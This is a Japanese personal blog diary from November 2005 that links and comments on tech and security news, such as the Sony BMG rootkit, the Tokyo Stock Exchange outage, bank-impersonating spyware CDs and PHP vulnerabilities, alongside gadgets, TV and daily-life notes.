トップ 最新

糸の切れた凧( a threadless kite )

ここは、管理人yamagataが方針未定のまま、何となーく思いついたことを思いついたままにだらだらと書き付ける日記帳です。ふんわりほんわかな感じでお願いします。
<< 2005年10月 2005年11月 2005年12月 >>  

2005/11/01(火)火曜日ー。(いつの間にか11月っすよ。)

[雑談] * mixiで広まっているシークレットバトンについて
『* マイミクシークレットバトン以外のシークレットバトン一覧
』 のページに、以前、* 某氏
から回ってきた、“セクハラバトン”(←勝手に命名)が載ってました〜。w[雑談] * ネットのゴールデンタイム、400万人以上がアクセス (ITmedia)
```textile
  • Web広告研究会
は10月31日、ネット利用のピークとなる午後9時から午後10時台の平均利用者数が、前年比10%増え、400万人を突破したと* 発表した
。```中高年層の利用もだいぶ広がって来ているそうです。[出来事] * 東証、システム障害で株売買停止 (ITmedia)
textile東証でシステム障害が発生。午前9時から株式全銘柄の立会取引を一時停止している。…復旧のめどは立っていない。立会い処理を行う通信制御システム6台のうち1台が立ち上がらなかったのが原因。
1台くらい立ち上がらなくても、縮退運転できないものですかね。[製品] 冬の野外イベントのお供@openmyaMLとのことです。(^-^;
  • おバカUSBグッズ:“USB手袋”発売 (ITmedia)
textileサンコーは、USBバスパワー対応カイロを内蔵する手袋「USBあったか手袋」を発売した。価格は1980円。
ちゃんと、手袋したままキーボードが打てるようになってるそうです。
  • USB CAFE PAD with HUB (Thanko, Inc.)
textile「USB CAFE PAD」は、文字通り、 パソコンのUSBポートへ接続することにより、暖かいコーヒーや紅茶、日本茶、白湯、ジュースなどの カップやカンを置いておくだけで飲み頃の約45度前後に保つことができる保温機器です。
よくビジネスホテルにある、お湯沸かす機械の USB版ですね。 飲み物こぼさなきゃ良いけど・・・。[製品] * ソリッドアライアンス、世界最小のUSBメモリ (PC Watch)
```textile
  • ソリッドアライアンス株式会社
は、世界最小を謳うUSBメモリ「iDisk Diamond」を1日より発売する。価格はオープンプライスで、直販価格は4,980円。```大きさは 27×12×1.9mm だそうです。 人差し指の第一関節に収まるくらいの大きさ。 金属探知機でチェックするようなデータセンターにでも持ち込めそうな予感。(汗  本体側つぶすしかないですな。[出来事] * 「ソフトは二重化できない」――東証の取引停止、原因はプログラムミス (ITmedia)
textile東証史上初となる全銘柄の取引停止を引き起こしたシステム障害の原因は、プログラムミスだったと分かった。…東証のシステムは、ハードを二重化してバックアップ体制を整えているが、ソフトは富士通に委託して構築した独自仕様品。「ソフトのバックアップを整えることは、現実的には不可能」
確かに、たまたま昔使っていた旧システムが残っていた、みたいな状況ならともかく、障害対策のために、同じ機能を持つ別系統の代替ソフトウェアを持っているなんてことは、通常はありえないですよねー。 去年4月の、* 東京航空交通管制部での障害
の時は、(本番系より若干機能が劣る) “待機系である3台目のハード” なんてものが出てきて驚きましたが。(^-^;[雑談] * 山口もえ6日“挙式” IT社長の尾関氏と近く入籍
textile先週、テレビ朝日系バラエティー番組「ロンドンハーツ」の収録に参加。その中で結婚を報告しており、今月中旬に結婚発表の模様が放送される。また他局のレギュラー番組でも結婚報告を行うようだ。
出川哲郎のローマでのプロポーズ(「星に願いを」のピアノ演奏に泣きました。)みたいに、特番でやってくれるのかなー? ちょっと見てみたい。[雑談] * 美容院で渡される雑誌は、どうやって決まるのか (ExciteBit)
え、美容院では雑誌って勝手に選んで手渡されるものなんですかー? 床屋さんとは違うのねw[出来事] * CD配布に注意!千葉銀語り、詐欺の危険!! (PJニュース)
textile千葉県最大手の地方銀行である千葉銀行でこのほど、同銀行をかたったパソコン向けCDが顧客らに送付されているとして、注意を促している事がわかった。
千葉銀行を騙る封筒で、「インターネットEBサービス<Web−EB>セキュリティパッチのご案内」と題する説明文 + スパイウェア入りのCD−ROMが郵送されて来たらしい。 リアル・フィッシング詐欺ですか?!(汗  NHKニュースでも出ていましたが、* 実際に1社騙され、数百万の被害を受けた
(取引の無い知らない口座に勝手に振込みがされてしまったらしい。)とのことです。

2005/11/02(水)水曜日ー。(昨日は会議ざんまいでした。)

[雑談] * 2006年どんな恋をする占い
  • 割り箸バイク便日記さん
のところから。
textileヤマガタさんは不倫の恋をします 不倫さんのあなたは、古風さと斬新な発想をあわせ持つバランス感覚溢れる人です。…また、自信に溢れたあなたの発言には説得力があり、安心感を与えます。その威厳あるオーラが、とっつきにくく思わせることもあります…。好奇心も旺盛なので、あらゆることに興味を持ち、知識を得ようとする努力家の面も。アイディアが豊富で、新しいことにチャレンジする意欲もあるので、細かいチェックさえ怠らなければ、事業などで大成するでしょう。
ふっ。 来年の俺に触るとヤケドするぜぃ。(←バカ。)  と言うか、ふつうな恋したいんですがw[セキュリティ] * IIJ、「分散サービス妨害攻撃」の対策サービス (日経)
textileインターネットイニシアティブ(IIJ)は、1度に大量の情報を送りつけてシステム停止に追い込む「分散サービス妨害(DDoS)攻撃」の企業向け対策サービスを12月に始める。顧客のネット回線を収容するIIJのビル内の設備に対策機器を設け、顧客の回線内に不正アクセスが流れてしまう前に食い止める。
セキュリティ監視とか稼動監視とかとセットならともかく、DDoS対策だけで月額50万円〜ってのはどうなんだろう? 大企業とか中央官庁向けを想定したサービスなのかな?関連: * プレスリリース - IIJ、「IIJ DDoS対策サービス」を開始
[雑談] 癒し系グッズ?
  • USBアクアリウム:UA-029 (ロアス)
textile付属品: USBケーブル(約1m)、おもちゃの魚2匹特長: ライトアップされた魚達がくるくると癒しの空間を作ります。
USB接続するからには、PCからお魚の遠隔操作とか出来て欲しいw
  • ドコモ、デスクトップツール「いつでもドコモダケ」を無償配布 (ケータイWatch)
textileNTTドコモは、同社のキャラクター「ドコモダケ」が登場するデスクトップツール「いつでもドコモダケ」の配布を開始した。利用は無料。
超シンプルながらRSSリーダー機能も搭載してるみたい。w ⇒* 配布サイト
[セキュリティ] * PHP File-Upload $GLOBALS Overwrite Vulnerability
PHP4 4.4.0以下 ならびに PHP5 5.0.5以下に重大な脆弱性。 'GLOBALS' という名前のファイルアップロードフィールドを持つ multipart/form-data な POSTリクエストを送信することで、本来、改変から保護されているはずの $GLOBALS 変数が自由に上書きできてしまうらしい。 これは、リモートからの任意のコード実行につながる恐れのある重大な問題とのこと。 PHP 4.4.1以降へのアップデートが必要。関連: * $GLOBALS Overwrite and it's Consequences
**[追記]** * PHPに“最悪”のセキュリティ・ホール,全ユーザーは今すぐ対処を (IT Pro)
[セキュリティ] * 対策のしおり - ボット対策、スパイウェア対策 (IPA)
textileIPA は、情報セキュリティ対策のための「ボット対策のしおり」および「スパイウェア対策のしおり」を作成いたしました。
家庭や社内の一般ユーザ向けの内容となっているようです。[雑談] * 今度の顔はひと味違うぜ、FreeBSD 新ロゴ決定 (MYCOM PC WEB)
デーモンくんから、かっちょいい ツノの生えた赤いボール(?!)に変わるそうです。[セキュリティ] * SONY BMGのコピー防止CDがrootkitを組み込む (ITmedia)
textileSONY BMGのコピーコントロールCDに、マルウェアのrootkitに類したソフトが含まれていることがセキュリティ企業F-Secureのブログで指摘された。
ウイルスなどの悪質なソフトウェアにこのrootkitを悪用された場合、ウィルス対策ソフトなどから検知されないように巧妙に隠れることが可能になったりする恐れがあるそうです。関連: * The "Sony rootkit" case (F-Secure)

2005/11/03(木)木曜日ー。(カルシウムが足りない?)

[動物] * (=`ω´)ノノ ≡● おさえがきかんnya (pya!)
赤い風船と とっても元気に戯れる猫さんの動画。 夢中らしいw[セキュリティ] * ソニーBMGのCD保護対策にセキュリティの懸念噴出--「行き過ぎ」との批判も (CNET)
  • 昨日の
20051102#p07
、F-Secure が ソニーBMG の rootkit じみたコピー防止技術を指摘した件ですが、
textileこのコピー対策ソフトウェアを開発した英国のFirst 4 Internetという会社は、偽装メカニズムがリスクでないこと、そして開発チームが確実を期すためにSymantecなどの大手ウイルス対策企業と密接に協力したことを明らかにした。
Symantec などの大手とは事前に協力していた、ということ?[雑談] * アマゾン 「バーチャル立ち読み」機能を公開 (bogusnews)
わお。 こんなヴァーチャル空間が本当にあったら面白いだろうなぁ。 誰か作ってw[セキュリティ] * マルウェアもオープンソースの時代? ソースコードの手厚いサポートも (ITmedia)
ウィルス作成のテクニカルサポートって、どうなのよ・・・。(汗
textileマルウェアパッケージとして、「Microsoft C++プロジェクトファイル」「ReadMeファイル」「テスト設定情報」「To Doリスト」「免責事項」「GPL(GNU Public Licenses)」が含まれており、しかもプライベートバージョン作成の宣伝するファイルまでもが含まれていたとのこと。
至れり尽くせりですね。(^-^;  GPLってことは、改造して亜種を作ったりした時は、ソースコードをどこかで公開しないといけないのかしら。 (公開しないと、ギルドの暗殺者に世界の端まで追いかけられて、後悔させられる、とか。(←妄想中w)(←駄洒落かよw))[出来事] * スパイウエアCD―ROM、北陸銀行でも被害 (読売新聞)
顧客が気づいて無いだけで、実は他にも被害があるのかも?
textile北陸銀行(富山市)のインターネットバンキングに契約している法人1社が、同行を装って郵送されたCD―ROMをパソコンに取り込んで操作したところ、預金がその後、別口座に送金されていたことが2日、わかった。
千葉銀行に続いて、北陸銀行を騙ったスパイウェア入りCD−ROMの郵送による勝手な送金の被害があったそうです。(振込先の銀行が全額を返却したため実害は無かったとのこと。)

2005/11/04(金)金曜日ー。(頭がイタイ@風邪で。)

[セキュリティ] * マイクロソフト セキュリティ情報の事前通知
textile2005 年 11 月 9 日 、マイクロソフトは以下のリリースを予定しています :**セキュリティ更新プログラム**• Microsoft Windows に影響を及ぼすマイクロソフト セキュリティ情報 1 件。このセキュリティ更新プログラムに関する最大深刻度は「緊急」です。
今月の月間Windowsアップデートの日は、「緊急」が1件だそうです。[出来事] * 【続報】名証、午後の取引から再開。障害原因はデータベースの不具合 (IT Pro)
textile名古屋証券取引所(名証)の相場報道システムが4日朝から停止していた件で、…障害の原因は「データベースの不具合」と発表したものの、「詳細な原因は(相場報道システムの)ベンダーである富士通から報告がないので、まだ分からない」(名証)としている。
あー。 思わず、「また富士通か!」と思ってしまいますよね。(^-^;一週間に2度なんて、タイミング悪いなぁ。 かわいそうに。 受難の一週間でしたね。[雑談] * 理系のための恋愛論 第191回 恋人いない同士で遊んでるからダメなのよ
ぅーむ。 会社で私の近所にいる人、今すぐ会社の女の子同士で二股かけてくださいw

2005/11/05(土)土曜日ー。(ときどき、まぶたがぴくぴくするー。@風邪?)

[セキュリティ] * CiscoがIOSの脆弱性を警告、Black Hatで公開の脆弱性とも関連 (ITmedia)
  • IOS Heap-based Overflow Vulnerability in System Timers
IOSの内部システムタイマーの処理に問題があり、ヒープオーバーフローが発生する。悪用されればDoS状態に陥り、ネットワークの停止などにつながるおそれがある。
  • Cisco Airespace Wireless LAN Controllers Allow Unencrypted Network Access
無線LANアクセスポイントのコントロールを行う「Cisco 2000/4400シリーズ」に、不正な接続を許すおそれのある脆弱性が存在する。
  • Cisco IPS MC Malformed Configuration Download Vulnerability
不正侵入検知システムの管理を行う「Cisco Management Center for IPS Sensors(IPS MC)」に、不正な設定ファイルをダウンロードしてしまうおそれがある。[雑談] * 私は何歳? ヤマハ発動機ブースで「性別年代推定技術」を試す (デジタルARENA)
カメラ+画像識別エンジンで、性別と年齢を推測するシステムだそうです。 正解率は性別で88%、年代で77%とのこと。 性別間違われたらショックだろうなぁw
textile「で、これは何を目的としたシステムなんですか?」とスタッフに質問してみた。思ってもみない答えが返ってきた。 「それを見つけるために出展したんですね」とのことだ。
・・・おーい?w[セキュリティ] こんな簡単に使われてしまう話だったのね・・・。例の* ソニーBMGのrootkitモドキ20051103#p02
の話ですが、
textile「$sys$」で始まる名前を持つファイル、ディレクトリー、プロセス、レジストリーキーが、ウィンドウズ上では一切ユーザーに見えなくなる。ルシノビッチ氏は、『メモ帳』ソフトのコピーを作って『$sys$notepad.exe』というファイル名に変更することで、これを確かめた。ファイル名を変えたとたんに、ウィンドウズ上では見えなくなったのだ。
あー、こりゃ、思いっきり、まんま rootkit だわw[製品] * アイ・オーの耐衝撃HDD「HDP-U」を試す 〜シリコンジャケットで武装したポータブルHDD (PC Watch)
各社で色んな耐衝撃HDDの仕組みが考えられている中、普通のHDDユニットに、シリコンで出来たジャケットを着せること(だけ)で耐衝撃性を高めた、アイ・オーのHDDについて特集されてました。 編集部の実験においては、75cm のテーブルからの落下はもちろんのこと、階段から5回 落としてみても問題なく動作したそうです。 動画も見れます。 結構強いものなのね。 びっくり。

2005/11/06(日)日曜日ー。(ジャズやるべ!)

[雑談] あれれ?キーボードがおかしくなった。 IME が OFF の状態で、普通にキーボード叩くと、半角カナが入力される。 a⇒チ みたいな。 IME を ON にすると、普通に英字が入る。 ローマ字変換もできる。 Alt+ローマ字 とかしても直らない。 ・・・Win+L でロックして、ログオンし直したら直った。[雑談] メモ
  • 日本語エラー・メッセージに対応する英語表記を調べる (@IT)
```textile
  • 用語の対訳リスト情報 (Japanese.zip)
ftp://ftp.microsoft.com/developr/MSDN/NewUp/Glossary/
C:\>find "エラー: 指定されたシグナルを待機できません。" c:\message\Japanese\jpn-jpn-csv-WindowsServer2003SP1.csv```
  • findstrで正規表現を検索する (@IT)
textilefindstr /r /c:"^Windows Server" *.log
不思議な正規表現ですね。 \< が単語の先頭、\> が単語の末尾にマッチしたりするらしい。[雑談] * 日本製キムチからも卵 揺らぐ食の安全 (bogusnews)
textileきよ子さんに同伴していた息子の直人くん(6)は「ぼく入れてないよ」と主張しているため、食品安全委は「キムチに混入していたもの」と判断した。
某おねえさんの買い物カゴにも、何かが混入することがありますか?w[雑談] * 親につかれたひどい嘘 (あんりみてっど)
回転すし屋のネタ、気に入りましたw これは皆さん使ってみるしかw[出来事] * XML-RPC for PHP の欠陥をついて広がるワーム (セキュmemo)
```textile
  • XML-RPC for PHP の欠陥
を使って繁殖するワームが登場した模様。攻略された事例: * [memo:8842] ワームらしきものに襲われました
。 XML-RPC for PHP はさまざまな PHP アプリで利用されているので注意が必要。```Webサーバのログに ほにゃらら/xmlrpc.php へのリクエスト、増えています?Virtual Host で、Host: ヘッダが無いと たどり着けないせいかな?全然無いや。w関連: * XML-RPC for PHP Vulnerability Attack (SANS)

2005/11/07(月)月曜日ー。(正規表現の逆襲@お仕事。)

[出来事] * 東証システム障害、原因は富士通の項目記載漏れ (ITmedia)
東証のシステム障害の原因は、アップデート方法の資料の記載漏れで、中途半端なアップデートが行われてしまい、結果としてシステムが異常を検知して停止したことだったそうです。
textile10月13日に修正後プログラムを正規登録する際に、富士通が東証側にバグ修正作業の資料を送付したが、必要な項目の一部に記載漏れがあったという。このため正規登録後のシステムに、修正後の正規プログラムと旧プログラムが混在する構成になってしまった。
“だが31日にディスクの圧縮処理を実行したところ、システムが旧プログラムを検知して正規プログラムとの関係を切断。” ・・・正規プログラムとの関係を切断?なんのことだろう? 業務系の話、よく分からないやw[雑談] * 正しいみかんの食べ方は存在する? (ExciteBit)
textile「みかんの正しい食べ方問題」1. 白いスジだけ簡単にとり、房ごと食べる人2. 房もスジも気にせず丸ごと食べる人3. スジをていねいにとり、房も吐き出す人4. 夏みかんのようにひと房づつむく人
私は、普段は2.で、時たま 1.かな。 普通のみかんで4.は難しいかとw[TV][あいのり] #291 小指の思い出ウクライナ横断中。 首都キエフからチェルノブイリ市へ。やじるし: ヒデ->アヤ<=>嵐。 tk->MIE->スーザン。 梅ちゃん。キエフで二人きりで自由時間を過ごすアヤと嵐。 ショッピングしたり、「恋人たちの像」を観光したりお互いに楽しそう。 (ヒデ、逆点はあるのか?__;)嵐“純粋にやっぱなんか幸せだなーっていうのをすごいやっぱ感じました。すっごい気持ちは高まりましたね。いや、もう、早く告白したいです。”tkがMIEにペンダントをプレゼント。 MIEは、(スーザンのことが気になっているので)それとなーくtkには気持ちが無いことを伝えようとする。MIE「MIEは・・・気になる人がいる。だから凄い楽しい楽しいやねんけどホンマにどうしたらいいのか、わかんない」しかし! tkは、MIEが自分のことを好きだと、ますます勘違い。tkの日記“MIEの気持ちが今日、明確にわかりました。こんなうれしい事はない” 司会陣から、とんでもない勘違い の略で、tkなんじゃないか、という新説がw来週は、「すべての恋は核心へと動いた!」ということで、tk&MIEや、嵐&ヒデ+アヤに色々な動きがあるらしい。 嵐がヒデに何か謝ってたし。。。(嵐、告白か?)⇒* 今週のあいのり
、* あいのりウラ話(メンバーの日記&サキからの手紙)

2005/11/08(火)火曜日ー。(ちぇるのぶいりを知らない世代。)

[セキュリティ] * Black Hat Japan 2005 - Unicode制御文字によるDirectory Traversal攻撃 (MYCOM PC WEB)
Black Hat Japan での伊原さんのセッションについての記事が出ています。
textile・見えない文字の混入によるフォレンジック回避策・Unicodeを利用したDirectory Traversal攻撃も可能・文字コード関連の分野はセキュリティ的に未知数の世界
よく、* 葉っぱさんの日記
で見るやつですね。 “変な深海魚のようなもの” という比喩には笑いましたwそう言えば、葉っぱさんの日記に、前にまっちゃの講演でもあった(らしい)、「Aというファイルを開こうとするとBというファイルが開いてしまう」件について、下記のコメントがありました:
textileデモで実演された、テキストエディタがディレクトリトラバーサルしてファイルを開いてしまうというのは、アプリケーションの不具合ではあるかも知れませんが、それ自体が何かの脅威を含むわけではありませんので、脆弱性ではありません。
「・・・と IPA に言われました」が心の中では後に続いてたりして。(ぇw[出来事] * <ネット詐欺>犯罪専門家ら5人逮捕 岩手県警
textile携帯電話の偽サイトに接続させて料金を請求するワンクリック詐欺で現金をだまし取ったとして、…インターネットジャーナリスト…ら男5人を詐欺の疑いで逮捕した。
ネット犯罪の専門家なのに、犯罪者としては素人だったんですね。(違[製品] * VS 2005のExpress Editionは事実上,無償提供へ (IT Pro)
textile米Microsoftは2005年11月7日,VSの新版であるVS 2005のうち入門者向けのExpress Editionを1年間限定で無償ダウンロード可能とした。同社のWebサイトから,誰でも(MSDN登録ユーザーに限ることなく)Visual Basic,C#,C++,J#の各Express Editonをダウンロードできる。
日本語版も、同様に無償配布する予定とのこと♪ Express Edition って、Professional や Standard に比べて、どれくらい機能が限定されているんだろう? * MSのページ
見たけど、いまいちピンとこないや。[出来事] * 偽Windows Updateでウイルス感染を企む迷惑メール、米Websenseが警告 (INTERNET Watch)
textileこの迷惑メールは、本文に「To Windows Customer」「Microsoft Update Team」などと記載。…「MS05-047」に似せた偽パッチ「Critical Update for Plug and Play devices MS05-4791k」をダウンロードさせようと、Windows Updateを偽装したサイトへのアクセスを促しているという。
ここまで似せるのに、なぜパッチ名だけ変える?w MS05-4791kってw

2005/11/09(水)水曜日ー。(授業中頭上注意×5 (早口言葉))

[雑談] * 仲間同士でブログをつなぐ「はてなリング」 (ITmedia)
textile「Webリング」のブログ版がはてなから登場。ブログ同士をつなぎ、新着記事を一覧できる。
新し物好きの葉っぱさんが、さっそく、「* openmyaなリング
」を作ってくれました♪(^-^)[IT] * 富士ゼロックス、ラベルに隠しデータ (日経)
一瞬、『* Xeroxプリンタに追跡コード20051018#p07
』の話を思い出してしまったw 今回は「勝手に〜」じゃないのねw よい場面でも、悪い場面でも、この手の技術が好きなのかな?(違
textile富士ゼロックスは小売店の店頭で商品のラベルのデザインをほとんど変えずに、バーコードと同じように管理データを盛り込める技術を開発した。…例えばコンビニエンスストアの弁当に張る製品ラベルに図柄を入れる際に、かげろうのように見える微妙な変化を付けて価格などの情報を盛り込む。
・・・店員さんが探しにくくないかな?w (別にバーコードを隠す意味が見出せないんだけど。)[雑談] * ひよこちゃん土鍋とチキンラーメンがセットになったチキンラーメン&土鍋セット (日清食品)
textile寒い季節に向けた商品として、煮込んでたったの1分で熱々のチキンラーメンをおいしく食べて頂ける、「チキンラーメン」と「ひよこちゃんオリジナル土鍋」のセットを期間限定(11月21日から約1ヶ月間)にて発売いたします。
土鍋とセットで379円だそうです。 ちょっと欲しいかもw[出来事] * 「Interop Tokyo 2005」の主催者、会場で個人情報入りサーバー紛失 (INTERNET Watch)
textileメディアライブ・ジャパンは、6月に幕張メッセで開催したイベント「Interop Tokyo 2005」で使用していたサーバーを紛失していたことを発表した。紛失したサーバーには、出展者や技術担当者のほか、ネットワークスペシャリストやボランティアなど約710件の個人情報が保存されていた。
誰かが、1台くらい無くなっても分からないだろう、と家に持って帰っちゃってたりしません?w関連: * お詫びとお知らせ (メディアライブ・ジャパン)
[雑談] ぎっくり背骨?今日の朝、会社に行くために歩いている時に、ふいに、大きく咳き込みました。 その瞬間です! 背中に激痛が走り、呼吸が急に苦しくなり、冷や汗が出てきました。 どうにか我慢して、電車に乗って会社に着いたのですが、ひどい痛みです。 姿勢良くしてると痛みはそれほどでもないのですが、ちょっと姿勢を変えたり大きく息を吸うとずきずき痛みます。 症状は、何年か前になったぎっくり腰みたいな感じなのですが、痛むのは、どう考えても腰というのには上過ぎます。 ぎっくり背骨でしょうか?(ぇw痛みが収まらなかったら病院に行こうと思ったのですが、だんだん収まってきた〜。 色々調べてたら、会社と同じビルのクリニック、整形外科もあるらしい。 ちゃんと MRI や CTスキャンまであるらしい。 知らなかった。 これなら安心だな。(>_<)  メモ: 駆け込むなら 18:30 までにw (←診療時間)[出来事] * グーグルの名前をかたるフィッシングサイトがついに出現--「400ドルの懸賞金」をエサに (CNET)
textileGoogleの名をかたって、「400ドルの懸賞金が当たった」と書かれた電子メールをユーザーに送りつけ、クレジットカードデータを盗み出すフィッシング詐欺が発生していると、セキュリティ専門家らが警告を発している。
クレジットカード番号を聞いてきた時点でアヤシイと思うようなwところで、クレジットカード番号が分かれば、正当な加盟店さんならお金の振込みもできるのでしょうか? そう言えば、前に、ネット通販でクレジットカードで買った商品の一部を返品した時、翌月の明細書にマイナスの金額が書いてあって、お金が戻っていたことがありましたが。[雑談] * 的外れなプレゼン資料を作ってませんか (IT Pro)
  • ずきんさん
のところにありました。
textileプレゼン資料における図解ノウハウの共有は,富士通だけでなく,野村総合研究所などでも進められている。図解のスキルは,ITエンジニア個人だけでなく,組織に求められるスキルへと位置づけを変えつつある。
私の近所では、ノウハウの共有どころか、同じ時期に 同じような資料を隣の部どおしで別々に作ってて、完成してみて初めて、「え、そっちでも作ってたの?」ということがあったようなw[雑談] * Trixie+mgsで隠密mixi (ぼくはまちちゃん!)
textilemgs は、ソーシャル・ネットワーキングサイト [ mixi ] の画面を目立たなくするためのスクリプトですよ! ようするに上司とかの目を盗んでmixiするやつだ!
mixiの画面を、* MSDNっぽく偽装
する方法のようですw

2005/11/10(木)木曜日ー。(まだちょっとだけ背中イタイ。)

[出来事] * ソニーが音楽CDに組み込んだ“Rootkit”とは何者か? (@IT)
例の SONY BMG の CD に付属していた、First 4 Internet の Rootkitじみた DRMソフトウェアの話の詳細が出ていました。 * Sysinternals
の方だけあって、さすがの内容です。 私じゃ原因突き止めたり復旧したりなんてとてもできません。 勉強不足を痛感。(>_<)[製品] * 外から見えないクリアファイル (ITmedia)
textileコクヨS&Tは、中の書類の文字が読めないよう加工したクリアファイル「クリヤーホルダー セキュリティビュー」を11月14日から順次発売する。…表面に特殊な地紋印刷を施し、中の書類を見にくくした。
どうせ中の書類が分からない状態になるのなら、苦労して加工してまで わざわざ「クリア」にせずに、不透明にしてしまえば良いと思ってしまう私は・・・夢が無い人ですか?w[雑談] * 有名企業のフィッシングサイト発見 注意を (bogusnews)
た、確かに有名企業だし、フィッシングサイトだw  高木先生のところにも昔あったなw[雑談] * 昼寝イス「いねむりくん」と富士山の関係 (ExciteBit)
textile「いねむりくん」は、「休憩時間ぐらいゆっくりしたい」と、従業員が職場の仕事道具を勝手に使って、寝いすを作ったことに始まるというのだ。…社長の足立さんは初めはいい気持ちがしなかったという。けれども、…あまりの寝心地の良さに怒りも吹き飛んでしまい、商品として開発することになったのだそうだ。
そうそう。 一見関係がなさそうなことでも、ゆくゆくは業務に役立つんですよ。 だから、これからは私が就業時間中に関係ないWeb見てても見逃して・・・くれるわけないかw[雑談] * 日本発の「ウォームビズブラ」、海外ブロガーにも大受け (CNET)
「日本人の発想力に敬意を表したい。冗談みたいな商品だけど、」に笑ったw 確かに。[出来事] * SONY BMG、rootkit的DRMめぐり訴えられる (ITmedia)
textileSONY BMG Music Entertainmentがカリフォルニア州で消費者に集団訴訟を起こされた。…問題のCDの販売差し止めと金銭的損害賠償を求めている。
あーあ、とうとう訴えられちゃいました。[出来事] * スパイウエア使い不正送金 警視庁摘発
textileスパイウエアで入手したIDなどを使い、他人の口座から約20万円を自分の口座に送金したとして、警視庁は10日までに、不正アクセス禁止法違反容疑で無職の男(34)を逮捕した。
スパイウェア使用による摘発は、全国初なんだそうです。[製品] * 30秒でストレスを唾液で判定…ニプロが開発 (読売)
textileプラスチック製チップを口にくわえ、ストレスと密接な関係がある消化酵素「アミラーゼ」の濃度を測る。約30秒で、ストレス度を示す数値とともに、「だいぶあるよ」から「ないよ」まで4段階のイラストが表示される仕組みだ。
4段階ですか。 実はずいぶんアバウトな機械なんじゃあ?(^-^;  結果を気にしすぎると、「かえってストレスの数値があがりそう」だという指摘もw[出来事] * 仏検察、暴動を扇動した疑いでブロガー数人を逮捕 (HotWired)
textile「われわれはサイト制作者と、『金曜[11月4日(現地時間)]の9時〜10時に「フランス全土を破壊せよ」と呼びかけるメッセージを書いた人物を逮捕した」と同検事は述べ、容疑者はパリ在住の成人と未成年者それぞれ1人ずつで、現在自宅で監禁され、刑事訴追を待つ身だと付け加えた。
ブログが原因で(機密情報は漏らしてないのに)会社を解雇されたり、(本気で人を騙すつもりは無い)お遊びの嘘ニュースで逮捕されたりというのは行き過ぎと思うときもありますが、「フランス全土を破壊せよ」は、確かに言いすぎだわ。(^-^;;;[セキュリティ] * 「数千台の感染PCで100万ドルの利益」 - Eugene Kaspersky氏が講演 (MYCOM PC WEB)
textile金銭を目的とする攻撃は広範な感染を必要としないため、「100万ドルの利益を上げるためには、数千台の感染PCがあれば十分」(同氏)可能であることから、大規模な感染が無くとも引き続き動向を注視する必要があることを強調した。
えぇ?! ボットってそんなに儲かるのか! (・・・ってやらないけどさw)
textileコーヒーメーカーからスパムが送信されたり、冷蔵庫を経由してドアがクラックされたりする時代が来るのではないかと、冗談を言っていると思わせる笑みを見せつつも、真剣な口調で語っていた。
日本では、ビデオデッキからコメントスパムが送信される事例(経由されただけだけどw)が実際にあったようですし、実は近い将来、十分ありえる話なんでしょうねぇ。

2005/11/11(金)金曜日ー。(ぎっくり背中、だいぶ治ったw)

[雑談] * Google Maps で鈴鹿サーキット試走
  • yoggyさんのとこ
で見つけました♪
textileGoogle Maps API を利用した…レーシングゲームです。地図データを元に走るので、ゲーム史上いまだかつてないコースの再現性があります。
Google Earth みたいに、視点を斜め上方から見てるように傾けて、しかも衛星写真で走れたりしたら、もっと面白いかも知れないなぁ。(←無茶言ってるw)  あと、もっとスムーズに動けば嬉しいw[雑談] * お取り寄せなら「サソリの缶詰」 (そむ子のひろば)
こ、これがお土産だったら、ネタというより 実は半分嫌がらせ?w 怖いよぅ。 サソリのトムヤム味・BBQ味、バッタのレッドカレー味、コオロギの玉子和え、カイコのサナギのスパイシーバジル味・・・。 私には食べられません。(汗  まぁ、もし どうしても どれか選べと言われたら、サソリのBBQ味かなw[セキュリティ] * セキュリティの大御所が集まり、代替暗号法を話し合う (ITmedia)
MD5,SHA-1 にコリジョンが起こることが分かってしまった今、次のハッシュ関数は何にすべきか、という「暗号ハッシュワークショップ」での話し合いについての記事。 本格的に SHA256 に移行するか、あるいは、SHA256 で得たハッシュ文字列の96ビット分を切り捨てて160ビットの文字列を得る(←既存のSHA-1用のシステムに適用が比較的容易)など色々な案があるらしい。[出来事] * SONY BMG「rootkit的」DRM悪用のトロイの木馬が出現 (ITmedia)
例の SONY BMG の(Rootkit的な)DRMソフトウェアの問題を悪用するトロイの木馬だそうです。
textile添付プログラムが実行されると、このトロイの木馬は$sys$drv.exeというファイルをコピーする。$sys$drv.exeと名付けられたファイルはSONY BMGがXCPコピー防止技術で導入した仕組みにより、コンピュータの中で「不可視」状態になる。
とうとう出ちゃいましたね。 訴訟も始まったようですし、ネタに使われるんだろうなぁ。(^-^;関連: * Trojan horse exploits Sony DRM copy protection vulnerability (SOPHOS)
[出来事] * 【速報】サイボウズのWebサイトが全面停止、不正アクセスの可能性 (IT Pro)
textileサイボウズのWebサイト(http://cybozu.co.jp/)が、11月10日23時の時点で全面停止している。同社は「不正アクセスの可能性が検知されましたため、可能性のあるサーバーを全面停止のうえ、緊急メンテナンスを行っております」とのコメントを、Webサイト上で掲載している。
下記のサイボウズのお知らせによると、サイボウズ製のソフトウェアが原因で侵入されたわけではないらしい。 とすると、原因は Webサーバかな? Webアプリかな?関連: * 弊社サイトへのアクセス障害について (サイボウズ)
[セキュリティ] * 「Apache Tomcat」の脆弱性修正プログラムの提供について (IPA)
  • 葉っぱさん
のところにありました。
textile開発元である The Apache Software Foundation に情報を通知し、修正プログラムの提供を依頼しました が、開発元からは、現在のところ、正式な修正プログラムは提供されていません。…これを受け、IPAでは、…本脆弱性の原因であるAJP 1.3 Connector の問題を修正するプログラムを作成し、提供することといたしました。
IPAってそんなことまでしてくれるのね。(汗関連: * JVN#79314822:「Tomcat」におけるリクエスト処理に関する脆弱性 - 修正プログラム (IPA)
[雑談] * 自動販売機のボタン同時押しの優先順位は? (ExciteBit)
飲み物などの自動販売機の商品ボタンを同時押しした時は・・・、一般的に、左上のボタンが有効になるらしいw 勉強になりました。(何に役立つか分からないけどw)

2005/11/12(土)土曜日ー。(りんご?! 見違えました♪)

[雑談] * iPod Nanoの悪魔的ケース (小太郎ぶろぐ)
赤い、悪魔デザインな iPod nano ケース、『* DIABLO for iPod nano
』 だそうです。 ぜひ、某優希おねえさまに、赤い Let's note とお揃いで持って欲しいところですw[出来事] * 「rootkit」騒動渦中のSONY BMG、XCP技術採用CDの製造を中止 (ITmedia)
textileSONY BMGは11月11日、問題となっている音楽違法コピー防止技術を採用しているCDの製造を中止すると語った。…「我々は自社のコンテンツ防止への取り組みをすべての面で再検討するつもりで、今後も引き続き、セキュリティとコンシューマーの利用が簡便になることを自社の目標とするつもりだ」とSONY BMGは付け加えた。
